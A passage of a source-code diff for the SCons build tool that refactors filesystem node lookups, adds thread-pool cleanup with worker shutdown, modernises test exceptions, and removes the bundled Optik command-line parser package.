had_explicit_value: - self.error("%s option does not take a value" % opt) - - else: - value = None - - option.process(opt, value, values, self) - - def _process_short_opts (self, rargs, values): - arg = rargs.pop(0) - stop = 0 - i = 1 - for ch in arg[1:]: - opt = "-" + ch - option = self._short_opt.get(opt) - i = i+1 # we have consumed a character - - if not option: - self.error("no such option: %s" % opt) - if option.takes_value(): - # Any characters left in arg? Pretend they're the - # next arg, and stop consuming characters of arg. - if i < len(arg): - rargs.insert(0, arg[i:]) - stop = 1 - - nargs = option.nargs - if len(rargs) < nargs: - if nargs == 1: - self.error("%s option requires a value" % opt) - else: - self.error("%s option requires %s values" - % (opt, nargs)) - elif nargs == 1: - value = rargs.pop(0) - else: - value = tuple(rargs[0:nargs]) - del rargs[0:nargs] - - else: # option doesn't take a value - value = None - - option.process(opt, value, values, self) - - if stop: - break - - - # -- Output/error methods ------------------------------------------ - - def error (self, msg): - """error(msg : string) - - Print a usage message incorporating 'msg' to stderr and exit. - If you override this in a subclass, it should not return -- it - should either exit or raise an exception. - """ - self.print_usage(sys.stderr) - sys.stderr.write("\nSCons error: %s\n" % msg) - sys.exit(2) - - def print_usage (self, file=None): - """print_usage(file : file = stdout) - - Print the usage message for the current program (self.usage) to - 'file' (default stdout). Any occurence of the string "%prog" in - self.usage is replaced with the name of the current program - (basename of sys.argv[0]). Does nothing if self.usage is empty - or not defined. - """ - if file is None: - file = sys.stdout - if self.usage: - usage = string.replace(self.usage,"%prog", get_prog_name()) - file.write(usage + "\n") - - def print_version (self, file=None): - """print_version(file : file = stdout) - - Print the version message for this program (self.version) to - 'file' (default stdout). As with print_usage(), any occurence - of "%prog" in self.version is replaced by the current program's - name. Does nothing if self.version is empty or undefined. - """ - if file is None: - file = sys.stdout - if self.version: - version = string.replace(self.version,"%prog", get_prog_name()) - file.write(version+"\n") - - def print_help (self, file=None): - """print_help(file : file = stdout) - - Print an extended help message, listing all options and any - help text provided with them, to 'file' (default stdout). - """ - # SCons: don't import wrap_text from distutils, use the - # copy we've included below, so we can avoid being dependent - # on having the right version of distutils installed. - #from distutils.fancy_getopt import wrap_text - - if file is None: - file = sys.stdout - - self.print_usage(file) - - # The help for each option consists of two parts: - # * the opt strings and metavars - # eg. ("-x", or "-fFILENAME, --file=FILENAME") - # * the user-supplied help string - # eg. ("turn on expert mode", "read data from FILENAME") - # - # If possible, we write both of these on the same line: - # -x turn on expert mode - # - # But if the opt string list is too long, we put the help - # string on a second line, indented to the same column it would - # start in if it fit on the first line. - # -fFILENAME, --file=FILENAME - # read data from FILENAME - - file.write("Options:\n") - width = 78 # assume 80 cols for now - - option_help = [] # list of (string, string) tuples - lengths = [] - - for option in self.option_list: - takes_value = option.takes_value() - if takes_value: - metavar = option.metavar or string.upper(option.dest) - - opts = [] # list of "-a" or "--foo=FILE" strings - if option.help is SUPPRESS_HELP: - continue - - if takes_value: - for sopt in option._short_opts: - opts.append(sopt + ' ' + metavar) - for lopt in option._long_opts: - opts.append(lopt + "=" + metavar) - else: - for opt in option._short_opts + option._long_opts: - opts.append(opt) - - opts = string.join(opts,", ") - option_help.append((opts, option.help)) - lengths.append(len(opts)) - - max_opts = min(max(lengths), 26) - - for (opts, help) in option_help: - # how much to indent lines 2 .. N of help text - indent_rest = 2 + max_opts + 2 - help_width = width - indent_rest - - if len(opts) > max_opts: - opts = " " + opts + "\n" - indent_first = indent_rest - else: # start help on same line as opts - opts = " %-*s " % (max_opts, opts) - indent_first = 0 - - file.write(opts) - - if help: - help_lines = wrap_text(help, help_width) - file.write( "%*s%s\n" % (indent_first, "", help_lines[0])) - for line in help_lines[1:]: - file.write(" %*s%s\n" % (indent_rest, "", line)) - elif opts[-1] != "\n": - file.write("\n") - -# class OptionParser - - -def _match_abbrev (s, wordmap): - """_match_abbrev(s : string, wordmap : {string : Option}) -> string - - Return the string key in 'wordmap' for which 's' is an unambiguous
__label__pos
0.979724
Draw isochrones in google maps Hello sirs, still the same problem but with progress ! I’m not sure if I can draw my isochrones in the google map’s maps can you confirm me that it is possible or only leaflet accept the isochrones draws ? Thanks. Hey, what do you mean when you state Could you elaborate on that? Are you trying to overlay any map from google.com/maps with a rendering of an isochrone? Are you trying to use the Maps JavaScript API? Do you attempt anything else? I’d assume that this is not a problem stemming from the isochrone returned by the openrouteservice, though - if it is, please let us know! Best regards
__label__pos
0.547754
Take the 2-minute tour × Code Review Stack Exchange is a question and answer site for peer programmer code reviews. It's 100% free, no registration required. I've created this very small header that allows direct creation of threads from lambdas. I can't find anything else similar on the net so I want to know whether there are any problems with this that I have not thought of. It is based on tinythread++, but can easily be altered to work with pthread or other threading libraries that can take a void (void*) (or void* (void*)) function and a void* argument for the function to start a thread. Note that this implementation is assuming limited C++0x/11 support, i.e. just lambdas. #include "tinythread.h" namespace lthread { /// implementation details - do not use directly namespace impl { template<typename Func> void use_function_once(void* _f) { const Func* f = (const Func*)_f; (*f)(); delete f; // delete - no longer needed } template<typename Func> void use_function(void* _f) { const Func* f = (const Func*)_f; (*f)(); } } /// Creates a thread based on a temporary function. /// Copies the function onto the heap for use outside of the local scope, removes from the heap when finished. template<typename Func> tthread::thread* new_thread(const Func& f) { Func* _f = new Func(f); // copy to heap return new tthread::thread(&impl::use_function_once<Func>,(void*)_f); } /// Creates a thread based on a guaranteed persistent function. /// Does not copy or delete the function. template<typename Func> tthread::thread* new_thread(const Func* f) { return new tthread::thread(&impl::use_function<Func>, (void*)f); } } Example usage: size_t a = 1; size_t b = 0; tthread::thread* t = lthread::new_thread([&] () { std::cout << "I'm in a thread!\n"; std::cout << "'a' is " << a << std::endl; b = 1; }); t->join(); std::cout << "'b' is " << b << std::endl; delete t; share|improve this question 1   What if (*f)(); should throw? You get a leak. –  user1095108 Aug 3 '13 at 23:17      @user1095108 Good point. –  Dylan Aug 5 '13 at 10:39 add comment 1 Answer 1 1. surely you can just use std::function<void()> instead of templating on the function type? 2. capturing by reference can go horribly wrong. It's not a bug in your library, just an observation ... tthread::thread* startthread(size_t a, size_t b) { return lthread::new_thread([&] () { std::cout << "I'm in a thread!\n"; std::cout << "'a' is " << a << std::endl; b = 1; } ); } int main() { tthread::thread *t = startthread(1,2); t->join(); delete t; } 3. use_function_once is vulnerable to the function call throwing an exception: you should probably assign it to a smart pointer before calling, and lose the explicit delete. 4. that overload of new_thread also has a problem if either new or tthread::thread can throw: it will leak the heap-allocated Func. You can fix this with a smart pointer too. share|improve this answer      I have already made a change to the code - the two new_thread functions now have different names - the by reference version was capturing the pointer argument instead of the pointer version and thus didn't compile as intended. –  Dylan Sep 19 '12 at 16:59      Also, I am fully aware of the point you are making with that snippet, but that also applies to any other deferred running of a lambda function. Users should be aware of this as when using by-reference lambdas in other situations. –  Dylan Sep 19 '12 at 17:01 add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.952574
Permalink Browse files MDL-49817 grunt: handle multiple watched files changed at once Includes multiple changes to the shifter task to simplify and support this: * Use grunt.file for shifter yui 'module' detection rather than our own 70 line function * Use grunt.util.spawn rather than our own exec for shifter * Improve behaviour on various yui subdirectories We have to add the 'async' depndency to npm because we are running multiple async operations in the single task. We use async.eachSeries to run each shifter job sequentally (else the output would be unreadable when running async). We also run shifter in non-recursive mode on the module directory so its not building everything (thanks to Ryan for pointing this out!) • Loading branch information... danpoltawski committed Jan 21, 2016 1 parent 0b777a0 commit 1aa454eda43051eae45953dab0bca24b21e24f70 Showing with 87 additions and 128 deletions. 1. +67 −123 Gruntfile.js 2. +19 −5 npm-shrinkwrap.json 3. +1 −0 package.json View @@ -25,7 +25,6 @@ module.exports = function(grunt) { var path = require('path'), fs = require('fs'), tasks = {}, cwd = process.env.PWD || process.cwd(), inAMD = path.basename(cwd) == 'amd'; @@ -92,55 +91,62 @@ module.exports = function(grunt) { files: ['**/yui/src/**/*.js'], tasks: ['shifter'] }, }, shifter: { options: { recursive: true, paths: [cwd] } } }); /** * Shifter task. Is configured with a path to a specific file or a directory, * in the case of a specific file it will work out the right module to be built. * * Note that this task runs the invidiaul shifter jobs async (becase it spawns * so be careful to to call done(). */ tasks.shifter = function() { var exec = require('child_process').spawn, var async = require('async'), done = this.async(), args = [], options = { recursive: true, watch: false, walk: false, module: false }, shifter; options = grunt.config('shifter.options'); grunt.log.ok("Running shifter on " + cwd); // Run the shifter processes one at a time to avoid confusing output. async.eachSeries(options.paths, function (src, filedone) { var args = []; args.push( path.normalize(__dirname + '/node_modules/shifter/bin/shifter')); // Always ignore the node_modules directory. args.push('--excludes', 'node_modules'); // Determine the most appropriate options to run with based upon the current location. if (path.basename(cwd) === 'src') { // Detect whether we're in a src directory. if (grunt.file.isMatch('**/yui/**/*.js', src)) { // When passed a JS file, build our containing module (this happen with // watch). grunt.log.debug('Shifter passed a specific JS file'); src = path.dirname(path.dirname(src)); options.recursive = false; } else if (grunt.file.isMatch('**/yui/src', src)) { // When in a src directory --walk all modules. grunt.log.debug('In a src directory'); args.push('--walk'); options.walk = true; } else if (path.basename(path.dirname(cwd)) === 'src') { // Detect whether we're in a module directory. options.recursive = false; } else if (grunt.file.isMatch('**/yui/src/*', src)) { // When in module, only build our module. grunt.log.debug('In a module directory'); options.module = true; } if (grunt.option('watch')) { if (!options.walk && !options.module) { grunt.fail.fatal('Unable to watch unless in a src or module directory'); } // It is not advisable to run with recursivity and watch - this // leads to building the build directory in a race-like fashion. grunt.log.debug('Detected a watch - disabling recursivity'); options.recursive = false; args.push('--watch'); } else if (grunt.file.isMatch('**/yui/src/*/js', src)) { // When in module src, only build our module. grunt.log.debug('In a source directory'); src = path.dirname(src); options.recursive = false; } if (options.recursive) { args.push('--recursive'); if (grunt.option('watch')) { grunt.fail.fatal('The --watch option has been removed, please use `grunt watch` instead'); } // Always ignore the node_modules directory. args.push('--excludes', 'node_modules'); // Add the stderr option if appropriate if (grunt.option('verbose')) { args.push('--lint-stderr'); @@ -152,19 +158,17 @@ module.exports = function(grunt) { var execShifter = function() { shifter = exec("node", args, { cwd: cwd, stdio: 'inherit', env: process.env }); // Tidy up after exec. shifter.on('exit', function (code) { grunt.log.ok("Running shifter on " + src); grunt.util.spawn({ cmd: "node", args: args, opts: {cwd: src, stdio: 'inherit', env: process.env} }, function (error, result, code) { if (code) { grunt.fail.fatal('Shifter failed with code: ' + code); } else { grunt.log.ok('Shifter build complete.'); done(); filedone(); } }); }; @@ -174,79 +178,15 @@ module.exports = function(grunt) { execShifter(); } else { // Check that there are yui modules otherwise shifter ends with exit code 1. var found = false; var hasYuiModules = function(directory, callback) { fs.readdir(directory, function(err, files) { if (err) { return callback(err, null); } // If we already found a match there is no need to continue scanning. if (found === true) { return; } // We need to track the number of files to know when we return a result. var pending = files.length; // We first check files, so if there is a match we don't need further // async calls and we just return a true. for (var i = 0; i < files.length; i++) { if (files[i] === 'yui') { return callback(null, true); } } // Iterate through subdirs if there were no matches. files.forEach(function (file) { var p = path.join(directory, file); var stat = fs.statSync(p); if (!stat.isDirectory()) { pending--; } else { // We defer the pending-1 until we scan the whole dir and subdirs. hasYuiModules(p, function(err, result) { if (err) { return callback(err); } if (result === true) { // Once we get a true we notify the caller. found = true; return callback(null, true); } pending--; if (pending === 0) { // Notify the caller that the whole dir has been scaned and there are no matches. return callback(null, false); } }); } // No subdirs here, otherwise the return would be deferred until all subdirs are scanned. if (pending === 0) { return callback(null, false); } }); }); }; hasYuiModules(cwd, function(err, result) { if (err) { grunt.fail.fatal(err.message); } if (result === true) { execShifter(); } else { grunt.log.ok('No YUI modules to build.'); done(); } }); if (grunt.file.expand({cwd: src}, '**/yui/src/**/*.js').length > 0) { args.push('--recursive'); execShifter(); } else { grunt.log.ok('No YUI modules to build.'); filedone(); } } }, done); }; tasks.startup = function() { @@ -263,17 +203,21 @@ module.exports = function(grunt) { } }; // On watch, we dynamically modify config to build only affected files. This // method is slightly complicated to deal with multiple changed files at once (copied // from the grunt-contrib-watch readme). var changedFiles = Object.create(null); var onChange = grunt.util._.debounce(function() { var files = Object.keys(changedFiles); grunt.config('jshint.amd.src', files); grunt.config('uglify.amd.files', [{ expand: true, src: files, rename: uglify_rename }]); grunt.config('shifter.options.paths', files); changedFiles = Object.create(null); }, 200); // On watch, we dynamically modify config to build only affected files. grunt.event.on('watch', function(action, filepath) { grunt.config('jshint.amd.src', filepath); grunt.config('uglify.amd.files', [{ expand: true, src: filepath, rename: uglify_rename }]); if (filepath.match('yui')) { // Set the cwd to the base directory for yui modules which have changed. cwd = filepath.split(path.sep + 'yui' + path.sep + 'src').shift(); } else { cwd = process.env.PWD || process.cwd(); } changedFiles[filepath] = action; onChange(); }); // Register NPM tasks. View Some generated files are not rendered by default. Learn more. Oops, something went wrong. View @@ -3,6 +3,7 @@ "private": true, "description": "Moodle", "devDependencies": { "async": "^1.5.2", "grunt": "0.4.5", "grunt-contrib-jshint": "0.11.3", "grunt-contrib-less": "1.1.0", 0 comments on commit 1aa454e Please sign in to comment.
__label__pos
0.995294
All Questions 638 votes 17answers 374279 views What is a race condition? When writing multi-threaded applications, one of the most common problems experienced are race conditions. My questions to the community are: What is a race condition? How do you detect them? How ... 36 votes 2answers 15204 views SQL Server Process Queue Race Condition I have an order queue that is accessed by multiple order processors through a stored procedure. Each processor passes in a unique ID which is used to lock the next 20 orders for its own use. The stor... 33 votes 2answers 10654 views Atomic UPDATE .. SELECT in Postgres I'm building a queuing mechanism of sorts. There are rows of data that need processing, and a status flag. I'm using an update .. returning clause to manage it: UPDATE stuff SET computed = 'working' ... 21 votes 4answers 46712 views MySQL INSERT IF (custom if statements) First, here's the concise summary of the question: Is it possible to run an INSERT statement conditionally? Something akin to this: IF(expression) INSERT... Now, I know I can do this with a stored... 19 votes 3answers 8825 views How to make sure there is no race condition in MySQL database when incrementing a field? How to prevent a race condition in MySQL database when two connections want to update the same record? For example, connection 1 wants to increase "tries" counter. And the second connection wants to ... 23 votes 4answers 10510 views Do database transactions prevent race conditions? It's not entirely clear to me what transactions in database systems do. I know they can be used to rollback a list of updates completely (e.g. deduct money on one account and add it to another), but i... 18 votes 1answers 3233 views Can we have race conditions in a single-thread program? You can find on here a very good explanation about what is a race condition. I have seen recently many people making confusing statements about race conditions and threads. I have learned that race ... 23 votes 4answers 1603 views Why would try/finally rather than a "using" statement help avoid a race condition? This question relates to a comment in another posting here: Cancelling an Entity Framework Query I will reproduce the code example from there for clarity: var thread = new Thread((param) => ... 2 votes 3answers 211 views Hidden threads in Javascript/Node that never execute user code: is it possible, and if so could it lead to an arcane possibility for a race condition? See bottom of question for an update, based on comments/answers: This question is really about the possibility of hidden threads that do not execute callbacks. I have a question about a potential a... 29 votes 6answers 11532 views Race conditions in django Here is a simple example of a django view with a potential race condition: # myapp/views.py from django.contrib.auth.models import User from my_libs import calculate_points def add_points(request): ... Previous Next
__label__pos
0.808394
Search Unity 1. Welcome to the Unity Forums! Please take the time to read our Code of Conduct to familiarize yourself with the forum rules and how to post constructively. 2. Join us on Thursday, June 8, for a Q&A with Unity's Content Pipeline group here on the forum, and on the Unity Discord, and discuss topics around Content Build, Import Workflows, Asset Database, and Addressables! Dismiss Notice New Physics-based Action Game Discussion in 'Works In Progress - Archive' started by hidingspot, Sep 16, 2014. 1. hidingspot hidingspot Joined: Apr 27, 2011 Posts: 87 A new project from SuperChop Games For now, we're calling it proto-1. We'll be sharing unity specific details on this thread, as well as more general discussions on TIGSource here, and our blog here. For anyone who is interested, please share your thoughts. Links to payable builds coming soon! Recent screenshot: Key Features - Completely physics-based - 2d action platformer - Procedural weapon system - Roguey-like-ish-type Platforms Yes - PC - Mac Probably - Linux Maybe - Console - PS Vita   Last edited: Oct 13, 2014 FBTH likes this. 2. marserMD marserMD Joined: Aug 29, 2014 Posts: 191 hi. As long as i understand, you can't control the character directly. If so, it's really cool. I've had the similar idea for an infinite runner. Maybe my plugin would be helpful for your explosions(it will be free, so it's not an advertisment)))   3. hidingspot hidingspot Joined: Apr 27, 2011 Posts: 87 You can control the character directly, but it's within the context of the physics engine. So, telling the character to move right applies a physics force in the right direction. At the end of the day, the goal is tight controls, but within the context of the physics engine, so that realistic dynamics effect every part of the gameplay (character movement included).   4. hidingspot hidingspot Joined: Apr 27, 2011 Posts: 87 Thought I'd share our implementation of a simple sandbox tool I created early on (well, it's still very early) in development. It's great for testing out scenarios and scene changes on the fly, from right within a running build of the game. First here's a little clip: The main piece of code is actually quite simple. It's called ObjectPlacer, and it does just that: Code (CSharp): 1. using UnityEngine; 2.   3. public class ObjectPlacer : MonoBehaviour 4. { 5.    /// <summary> 6.    /// Possible prefabs to be selected randomly 7.    /// </summary> 8.    public GameObject[] prefabs; 9.    GameObject current; 10.   11.    void Update () 12.    { 13.      if (prefabs.Length < 1) { 14.        return; 15.      } 16.      // recreate a prefab to place if there is none 17.      if (current == null) { 18.        ReCreate (); 19.      } 20.      current.transform.position = transform.position; 21.      if (Input.GetMouseButtonDown (0)) { 22.        PlaceObject (current); 23.      } 24.    } 25.   26.    public void ReCreate () 27.    { 28.      // handle when Unity UI calls methods in edit mode 29.      if (!Application.isPlaying || !enabled || !gameObject.activeInHierarchy) { 30.        return; 31.      } 32.      if (current != null) { 33.        Destroy (current); 34.      } 35.      current = CreateObject (prefabs [Random.Range (0, prefabs.Length)]); 36.    } 37.   38.    virtual protected void PlaceObject (GameObject go) 39.    { 40.      // let go of current object, setting it's position 41.      // and signaling for a new one to be created 42.      current = null; 43.    } 44.   45.    virtual protected GameObject CreateObject (GameObject fromPrefab) 46.    { 47.      return Instantiate (fromPrefab) as GameObject; 48.    } 49.   50.    void OnDisable () 51.    { 52.      if (current != null) { 53.        Destroy (current); 54.      } 55.    } 56. } For each type of object/prefab you want to be able to place in the sceen, you'd have an ObjectPlacer object in the hierarchy which points to that prefab (or multiple to pull randomly): All the Unity UI does is set which ObjectPlacer is active/inactive on button toggle: One important note. You want to make sure that object placer's aren't active while hovering over buttons. Otherwise, anytime you select a new button, it will create any existing selected object at the location of that button. After some fumbling with the Rect class, I realized a much simpler way to achieve this. The new Unity UI automatically swallows events based on the GraphicRaycaster behaviour which is attached to the canvas. All we need to do is create a "placement area" panel/image behind the rest of the gui which turns the sandbox tools' parent on/off on pointer enter/exit. Though it is fully transparent, the image component is required to trigger the enter/exit events: Hope you find this useful!   Last edited: Sep 30, 2014 5. hidingspot hidingspot Joined: Apr 27, 2011 Posts: 87 Here's a first look at the door that transports the player between it's cozy home base and the big bad game world. The idea is that between levels the player will be able to travel to his/her safe-home, wherein powerups, customizations, and other fun stuff can be configured.   ludiares likes this. 6. hidingspot hidingspot Joined: Apr 27, 2011 Posts: 87 Oh dear, they're getting smarter... Little ground enemies now traverse and climb over obstacles towards their destination. In this case, toward an unsuspecting player character. Going to be traveling for several days, but I'll try to find time to write about the AI system. It's pretty cool.   7. Myhijim Myhijim Joined: Jun 15, 2012 Posts: 1,148 Surprised this hasn't been given much attention, it looks like a sweet little side-scroller. Those little things freak me out and the AI behind them seems solid.   8. stoilcho stoilcho Joined: Sep 8, 2014 Posts: 30 I'm digging the Geometry Wars stripped down graphics (proper name for those is ? ) and the ticks are looking awesomely creepy. I will totally provide detailed feedback once we have a web demo. I do have a question for OP and I'm sorry for watering down the thread, but OP stated: So, telling the character to move right applies a physics force in the right direction. I'm working on a top-down game that is not really physics based but I'm still using addForce and stuff like that to move the characters, projectiles and stuff around. Is that somehow bad practices if a game is not to be 'physics-based' ? Thanks guys   9. hidingspot hidingspot Joined: Apr 27, 2011 Posts: 87 I wouldn't say it's bad practice, as long as you're happy with the results. Most of the time, with character controllers especially, you'll see people set rigidbody velocity directly. Doing it that way gives somewhat more predicable results (you specify just how fast and in what direction the character moves). In my case, I wanted that degree of unpredictability, so that interesting physics interactions could bubble up immergently. Like in this early test where the player grabs a flying enemy and drags it to the ground. The only part of that interaction that was coded was the grab:   10. hidingspot hidingspot Joined: Apr 27, 2011 Posts: 87 Thanks, I'll definitely try to post about the AI in the next week. I'll include a gif of the load test I did with a whole bunch of those little creepers on the screen at once.   11. hidingspot hidingspot Joined: Apr 27, 2011 Posts: 87 Using Mecanim for AI State Machine I had begun using a simple state machine codebase from a previous project, but decided to try using Mecanim as a generic state machine. Having a visual state tool in the editor is a big aid to tackling complex AI. After seeing the announcement that Unity 5 will support state machine behaviours, I thought it would be nice to implement a wrapper solution in the meantime, which would not only allow the use of Mecanim state behaviours, but also easy migration when Unity 5 becomes available. The main class is call "MecanimWrapper". It associates mecanim states with Unity behaviours, and sets those behaviours enabled based on the active mecanim state. You can see that the names of the state behaviours listed in the Mecanim Wrapper match those seen in the screenshot of the Mecanim Animator state machine. So, when the state machine idle state starts, the AiGroundIdle script is enabled. When the state switches to chase, the AiGroundIdle script is disabled and the AiGroundChase script is enabled. All the while, the Animator windows gives a clear view of which state is active. Very handy for debugging and visualizing AI. So here's really the only thing you need to try it out yourself, the MecanimWrapper class (AiMecanimWrapper above is a basic extension of that class). Code (CSharp): 1. using UnityEngine; 2. using System.Collections.Generic; 3.   4. public class MecanimWrapper : MonoBehaviour 5. { 6.     public Animator animator; 7.     public StateBehaviour[] stateBehaviours; 8.     static int CURRENT_STATE_TIME = Animator.StringToHash ("currentStateTime"); 9.     Dictionary<int, Behaviour[]> behaviourCache; 10.     int currentState; 11.     float _currentStateTime; 12.   13.     float currentStateTime { 14.         get { 15.             return _currentStateTime; 16.         } 17.         set { 18.             _currentStateTime = value; 19.             animator.SetFloat (CURRENT_STATE_TIME, _currentStateTime); 20.         } 21.     } 22.   23.     void Start () 24.     { 25.         behaviourCache = new Dictionary<int, Behaviour[]> (); 26.         foreach (StateBehaviour item in stateBehaviours) { 27.             int nameHash = Animator.StringToHash (item.layer + "." + item.state); 28.             behaviourCache.Add (nameHash, item.behaviours); 29.             SetBehavioursEnabled (item.behaviours, false); 30.         } 31.     } 32.   33.     void Update () 34.     { 35.         currentStateTime += Time.deltaTime; 36.         int state = animator.GetCurrentAnimatorStateInfo (0).nameHash; 37.         if (state != currentState) { 38.             ChangeState (state); 39.         } 40.     } 41.   42.     void ChangeState (int toState) 43.     { 44.         if (behaviourCache.ContainsKey (currentState)) { 45.             SetBehavioursEnabled (behaviourCache [currentState], false); 46.         } 47.         if (behaviourCache.ContainsKey (toState)) { 48.             SetBehavioursEnabled (behaviourCache [toState], true); 49.         } 50.         currentState = toState; 51.         currentStateTime = 0f; 52.     } 53.   54.     void SetBehavioursEnabled (Behaviour[] behaviours, bool enabled) 55.     { 56.         foreach (Behaviour behaviour in behaviours) { 57.             behaviour.enabled = enabled; 58.         } 59.     } 60.   61.     [System.Serializable] 62.     public class StateBehaviour 63.     { 64.         public string state; 65.         public string layer = "Base Layer"; 66.         public Behaviour[] behaviours; 67.     } 68. } One important note: In these state machines, I'm using a transition time of 0. I'm not certain if states overlap during a transition with time > 0, so keep that in mind when creating your mecanim state machines. Hope you find this useful!   Last edited: Oct 13, 2014 RemDust and coingod like this.
__label__pos
0.966556
2. Writing Tests for PHPUnit Example 2.1 shows how we can write tests using PHPUnit that exercise PHP’s array operations. The example introduces the basic conventions and steps for writing tests with PHPUnit: 1. The tests for a class Class go into a class ClassTest. 2. ClassTest inherits (most of the time) from PHPUnit\Framework\TestCase. 3. The tests are public methods that are named test*. Alternatively, you can use the @test annotation in a method’s docblock to mark it as a test method. 4. Inside the test methods, assertion methods such as assertSame() (see Assertions) are used to assert that an actual value matches an expected value. Example 2.1 Testing array operations with PHPUnit <?php use PHPUnit\Framework\TestCase; class StackTest extends TestCase { public function testPushAndPop() { $stack = []; $this->assertSame(0, count($stack)); array_push($stack, 'foo'); $this->assertSame('foo', $stack[count($stack)-1]); $this->assertSame(1, count($stack)); $this->assertSame('foo', array_pop($stack)); $this->assertSame(0, count($stack)); } } Martin Fowler: Whenever you are tempted to type something into a print statement or a debugger expression, write it as a test instead. Test Dependencies Adrian Kuhn et. al.: Unit Tests are primarily written as a good practice to help developers identify and fix bugs, to refactor code and to serve as documentation for a unit of software under test. To achieve these benefits, unit tests ideally should cover all the possible paths in a program. One unit test usually covers one specific path in one function or method. However a test method is not necessarily an encapsulated, independent entity. Often there are implicit dependencies between test methods, hidden in the implementation scenario of a test. PHPUnit supports the declaration of explicit dependencies between test methods. Such dependencies do not define the order in which the test methods are to be executed but they allow the returning of an instance of the test fixture by a producer and passing it to the dependent consumers. • A producer is a test method that yields its unit under test as return value. • A consumer is a test method that depends on one or more producers and their return values. Example 2.2 shows how to use the @depends annotation to express dependencies between test methods. Example 2.2 Using the @depends annotation to express dependencies <?php use PHPUnit\Framework\TestCase; class StackTest extends TestCase { public function testEmpty() { $stack = []; $this->assertEmpty($stack); return $stack; } /** * @depends testEmpty */ public function testPush(array $stack) { array_push($stack, 'foo'); $this->assertSame('foo', $stack[count($stack)-1]); $this->assertNotEmpty($stack); return $stack; } /** * @depends testPush */ public function testPop(array $stack) { $this->assertSame('foo', array_pop($stack)); $this->assertEmpty($stack); } } In the example above, the first test, testEmpty(), creates a new array and asserts that it is empty. The test then returns the fixture as its result. The second test, testPush(), depends on testEmpty() and is passed the result of that depended-upon test as its argument. Finally, testPop() depends upon testPush(). Note The return value yielded by a producer is passed “as-is” to its consumers by default. This means that when a producer returns an object, a reference to that object is passed to the consumers. Instead of a reference either (a) a (deep) copy via @depends clone, or (b) a (normal shallow) clone (based on PHP keyword clone) via @depends shallowClone are possible too. To quickly localize defects, we want our attention to be focussed on relevant failing tests. This is why PHPUnit skips the execution of a test when a depended-upon test has failed. This improves defect localization by exploiting the dependencies between tests as shown in Example 2.3. Example 2.3 Exploiting the dependencies between tests <?php use PHPUnit\Framework\TestCase; class DependencyFailureTest extends TestCase { public function testOne() { $this->assertTrue(false); } /** * @depends testOne */ public function testTwo() { } } $ phpunit --verbose DependencyFailureTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. FS Time: 0 seconds, Memory: 5.00Mb There was 1 failure: 1) DependencyFailureTest::testOne Failed asserting that false is true. /home/sb/DependencyFailureTest.php:6 There was 1 skipped test: 1) DependencyFailureTest::testTwo This test depends on "DependencyFailureTest::testOne" to pass. FAILURES! Tests: 1, Assertions: 1, Failures: 1, Skipped: 1. A test may have more than one @depends annotation. PHPUnit does not change the order in which tests are executed, you have to ensure that the dependencies of a test can actually be met before the test is run. A test that has more than one @depends annotation will get a fixture from the first producer as the first argument, a fixture from the second producer as the second argument, and so on. See Example 2.4 Example 2.4 Test with multiple dependencies <?php use PHPUnit\Framework\TestCase; class MultipleDependenciesTest extends TestCase { public function testProducerFirst() { $this->assertTrue(true); return 'first'; } public function testProducerSecond() { $this->assertTrue(true); return 'second'; } /** * @depends testProducerFirst * @depends testProducerSecond */ public function testConsumer($a, $b) { $this->assertSame('first', $a); $this->assertSame('second', $b); } } $ phpunit --verbose MultipleDependenciesTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ... Time: 0 seconds, Memory: 3.25Mb OK (3 tests, 3 assertions) Data Providers A test method can accept arbitrary arguments. These arguments are to be provided by a data provider method (additionProvider() in Example 2.5). The data provider method to be used is specified using the @dataProvider annotation. A data provider method must be public and either return an array of arrays or an object that implements the Iterator interface and yields an array for each iteration step. For each array that is part of the collection the test method will be called with the contents of the array as its arguments. Example 2.5 Using a data provider that returns an array of arrays <?php use PHPUnit\Framework\TestCase; class DataTest extends TestCase { /** * @dataProvider additionProvider */ public function testAdd($a, $b, $expected) { $this->assertSame($expected, $a + $b); } public function additionProvider() { return [ [0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 3] ]; } } $ phpunit DataTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ...F Time: 0 seconds, Memory: 5.75Mb There was 1 failure: 1) DataTest::testAdd with data set #3 (1, 1, 3) Failed asserting that 2 is identical to 3. /home/sb/DataTest.php:9 FAILURES! Tests: 4, Assertions: 4, Failures: 1. When using a large number of datasets it’s useful to name each one with string key instead of default numeric. Output will be more verbose as it’ll contain that name of a dataset that breaks a test. Example 2.6 Using a data provider with named datasets <?php use PHPUnit\Framework\TestCase; class DataTest extends TestCase { /** * @dataProvider additionProvider */ public function testAdd($a, $b, $expected) { $this->assertSame($expected, $a + $b); } public function additionProvider() { return [ 'adding zeros' => [0, 0, 0], 'zero plus one' => [0, 1, 1], 'one plus zero' => [1, 0, 1], 'one plus one' => [1, 1, 3] ]; } } $ phpunit DataTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ...F Time: 0 seconds, Memory: 5.75Mb There was 1 failure: 1) DataTest::testAdd with data set "one plus one" (1, 1, 3) Failed asserting that 2 is identical to 3. /home/sb/DataTest.php:9 FAILURES! Tests: 4, Assertions: 4, Failures: 1. Example 2.7 Using a data provider that returns an Iterator object <?php use PHPUnit\Framework\TestCase; require 'CsvFileIterator.php'; class DataTest extends TestCase { /** * @dataProvider additionProvider */ public function testAdd($a, $b, $expected) { $this->assertSame($expected, $a + $b); } public function additionProvider() { return new CsvFileIterator('data.csv'); } } $ phpunit DataTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ...F Time: 0 seconds, Memory: 5.75Mb There was 1 failure: 1) DataTest::testAdd with data set #3 ('1', '1', '3') Failed asserting that 2 is identical to 3. /home/sb/DataTest.php:11 FAILURES! Tests: 4, Assertions: 4, Failures: 1. Example 2.8 The CsvFileIterator class <?php use PHPUnit\Framework\TestCase; class CsvFileIterator implements Iterator { protected $file; protected $key = 0; protected $current; public function __construct($file) { $this->file = fopen($file, 'r'); } public function __destruct() { fclose($this->file); } public function rewind() { rewind($this->file); $this->current = fgetcsv($this->file); $this->key = 0; } public function valid() { return !feof($this->file); } public function key() { return $this->key; } public function current() { return $this->current; } public function next() { $this->current = fgetcsv($this->file); $this->key++; } } When a test receives input from both a @dataProvider method and from one or more tests it @depends on, the 